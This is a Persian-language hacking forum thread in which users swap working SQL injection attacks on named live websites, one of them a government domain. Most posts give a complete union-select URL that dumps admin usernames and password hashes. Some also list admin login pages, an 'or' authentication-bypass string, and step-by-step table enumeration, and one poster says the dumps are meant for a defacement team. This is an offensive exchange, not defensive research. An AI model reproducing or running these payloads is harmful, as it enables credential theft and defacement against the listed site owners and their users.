رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

C0d3!Nj3ct!0n

پست های پیشنهاد شده

تارگت:


http://www.thejungleisland.com/readnews.php?id=6 



یوزر و پسورد:

http://www.thejungleisland.com/readnews.php?id=6%27+union+select+1,2,3,group_concat(char(60,98,114,62),username,0x3a,password)+from+admin--+

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


تارگت:

This is the hidden content, please
 


یوزر و پسورد:

http://revistaramuri.ro/index.php?id=-460%20union%20select%201,2,3,group_concat(id,0x3a,email,0x3a,password,0x3a,usertype,0x3a,nume,0x0a),5,@@datadir,7%20from%20admusers--

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


با سلام و عرض ادب خدمت عزیزان گل

 

 

بنده بیشتر توی sqli فعالیت میکنم وقتی این تایپک رو دیدم واقعا دلم سوختش این تایپک نباید اینجوری باشه

عزیزان گزاشتن تارگت فقط چیزیو حل نمیکنه همه میتونن با یه سرچ ساده اینارو بدست بیارن لطفا سعی کنید تارگت هایی که میزارید حداقل یوزر و رمز اونو هم بزارید تا هم عزیزان تازه وارد استفاده کنن و هم مورد استفاده تیم دیفیس قرار بگیره

 

بنده تازه عضو شدم و میخوام این تایپک رو بالا بیارم

اگر من هم مثل شما فقط تارگت بزارم میتونم روزی 700 تا بزارم
سعی کنید یوزر و رمز رو هم بزارید

حالا برای این که این پیام اسپم حساب نشه خودم تارگت میزارم



تارگت:
http://www.crystallakenet.org/record.php?_ID=-8004

یوزر و پسورد :

http://www.crystallakenet.org/record.php?_ID=-8004+/*!union*/+all+/*!select*/+1,/*!gRouP_CoNCaT(char(60,98,114,62),username,0x3a,PASSWORD)*/,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+fRoM+ciab_member--

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


بازم میگم تنها تارگت نزارین

http://www.mydoctorsdirectory.com/pathlabDetail.php?id=-3 


http://www.mydoctorsdirectory.com/pathlabDetail.php?id=-3%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,group_concat(login,0x3a,password),14,15,16,17,18,1
9,20%20from%20admin

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


درود

خطاب به دوست عزیزمون که میگن تارگت تنها قرار ندیم :

ببینید درواقع حرف شما کامل درست نیست البته برای دوستانی که فقط تارگت میزارن هم باید احترام قائل باشید و اگر خواستید میتونید شما اینجکت کنید و بزارید

ولی شما میگید که تارگتو کامل اینجکت شده بزارید

پس این تاپیک چه فرقی با نرم افزار هویج داره ؟؟

This is the hidden content, please
/emoticons/smile@2x.png 2x" width="20" height="20" />

ببینید شما دارید با اینجکت کامل مانع خلاقیت میشید من سعی میکنم تارگت هامو تا مرحله version اینجکت کنم بقیش هم با دوستان منتهی مشکلات رو توی خصوصی پاسخ گو هستم

دیگه بحث رو ادامه ندیم و مانع اسپم بشیم ...

این تارگت هم جالب اینجکت میشه

This is the hidden content, please

بعد هم کالومن اسیب پذیر و ورژن

This is the hidden content, please

راهنمایی:

ساده اینجکت نمیشه

تو یونیون بیس : multi injection برین جلو

ارور بیس جواب نمیده ولی تایم بیس میتونید پیش برید

انگیزتونو بیشتر کنم :

تارگتو دیفیس نمیکنم هرکی اینجکت کرد جایزش :دی

This is the hidden content, please

پیروز باشید ...............

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


تارگت:

http://www.miltonvalepark.com/stories01.php?id=999



یوزر و پسورد:

 

 

http://www.miltonvalepark.com/stories01.php?id=-999%20union%20select%201,2,unhex(hex(group_concat(char(60,98,114,62),username,0x3a,password))),4,5,6%20from%20admin--

 

 

 

 

 

 

ادمین پیج پیدا نشدش:|

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


سلامی دوباره

این باره با یک تارگی که ادمین پیج داره اومدم ولی متاسفانه هش کرک نشد :|

تارگت :

http://feka.se/wds_news/article.php?ID=-20 

 

یوزر و پسورد :

 

http://feka.se/wds_news/article.php?ID=-20+union+select+1,group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9,10+from+cms_admin--

 

ادمین پیج :

http://feka.se/wds_cms/admin/login.php 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


تارگت:

http://hukum.kubarkab.go.id/index.php?page=static&id_page=-9 

یوزر و پسورد:
http://hukum.kubarkab.go.id/index.php?page=static&id_page=-9%20union%20select%201,2,group_concat%28username,0x3a,password,0x3a,email%29,4,5+from+bh_user

ادمین پیج:

http://hukum.kubarkab.go.id/admin/

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


یوزر و پسورد سایت:

This is the hidden content, please


صفحه ورود هم داخلشه

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


تارگت:

This is the hidden content, please

ادرس لوگین:

This is the hidden content, please

User And Pass :
'=' 'or'
'=' 'or'

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


تارگت:

This is the hidden content, please

تعداد کالومن ها:

This is the hidden content, please

کالومن های آسیب پذیر:

This is the hidden content, please

بقیش با خودتون

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


این تارگت طریقه اینجکت کردنش خیلی سادست

تارگت:

This is the hidden content, please

تعداد کالومن ها:

This is the hidden content, please

کالومن آسیب پذیر:

This is the hidden content, please

1 و 2 آسیب پذیره و ادامه کارو با 2 میریم

تیبل های داخل کالومن 2:

This is the hidden content, please

خب اینجا برای ما مهم rc_users هست

کالومن های داخل تیبل:

This is the hidden content, please

میبینید که username و password اینجاست

یوزر و پس:

This is the hidden content, please

دوتا یوزر و پسورد داریم که پسوردها هش شدن که من براتون کرک شدشو گذاشتم:

This is the hidden content, please

حالا ادمین پیج رو پیدا کنید و حالشو ببرید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


خب یه تارگت ساده دیگه =))

تارگتمون که اصلا نیازی به ارور گرفتن نداره چون این اول ارور بوده بعد دست و پا درآورده =))

تارگت:

This is the hidden content, please

تعداد کالومن:

This is the hidden content, please

کالومن های آسیب پذیر:

This is the hidden content, please

خب میبینید که از 18 تا 10 تاش آسیب پذیره که شامل 3.6.10.11.4.5.8.7.9.13 میشه

خب شما از بین ده تا میتونید یکی رو انتخاب کنید که ما با 3 پیش میریم

تیبل های داخل کالومن:

This is the hidden content, please

و باز هم مثل همیشه شانس نداشتیم و چیزی داخل اینا نبود

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


This is the hidden content, please



شل هم قرار خواهد گرفت 
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


سلام
این برای دوستان تازه وارد

تارگت

This is the hidden content, please

قسمت ورودی اینجکت

This is the hidden content, please

تست آسیب پذیری

This is the hidden content, please

سایت ارور داد پس باگ داره

شمردن ستون ها

This is the hidden content, please

متود integer هست
روی ۱۲ ارور میده روی ۱۱ نمیده پس ۱۱ هست

This is the hidden content, please

بقیش با خودتون یا حق

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


  • 2 هفته بعد...

سلام
admin page:

This is the hidden content, please

user & pass:

This is the hidden content, please
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


سلام

یه تارگت ساده با باگ sql که دیگه هر چی لمر باشم تارگت به این سادگی رو میتونم بزنم 

This is the hidden content, please



تارگت:

This is the hidden content, please

تعداد کالومن:

This is the hidden content, please

کالومن آسیب پذیر:

This is the hidden content, please

خب میبینیم که 9و11و14و24و17و18و20 آسیب پذیرند

ما به 20 میریم جلو

خب میریم سراغ تیبل های داخل 20:

This is the hidden content, please

خب میبینیم که بین اینا یکی که واسه ما مهم تره users هست

کالومن های داخل تیبل users:

This is the hidden content, please

خب میبینیم که username و password اینجان

حالا بریم یوزر و پس رو در بیاریم:

This is the hidden content, please

صفحه ادمین

This is the hidden content, please
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


سلام خدمت دوستان عزیز.

This is the hidden content, please
/emoticons/wink@2x.png 2x" width="20" height="20" />

 

تارگت sql دارم تازه از تنور در اومده.

This is the hidden content, please
/emoticons/biggrin@2x.png 2x" width="20" height="20" />

 

راهنمایی: به صورت کامل اینجکت میشه. دوستان مبتدی هم میتونن این سایت رو با هویج اسکن کنن.

 

This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

×
×
  • ایجاد مورد جدید...